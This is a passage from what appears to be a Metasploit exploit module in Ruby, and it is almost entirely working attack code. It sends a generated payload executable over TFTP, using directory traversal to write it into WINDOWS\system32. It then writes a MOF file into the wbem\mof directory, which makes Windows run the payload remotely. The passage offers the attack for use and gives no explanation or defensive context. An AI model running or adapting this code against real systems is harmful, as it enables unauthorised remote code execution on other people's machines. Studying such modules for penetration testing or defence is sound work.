ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
# Setup the necessary files to do the wbemexec trick
exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)
# Configure how deep we want to traverse
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth
# Upload the malicious executable to C:\Windows\System32\
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
# Let the TFTP server idle a bit before sending another file
select(nil, nil, nil, 1)
# Upload the mof file
print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
end
end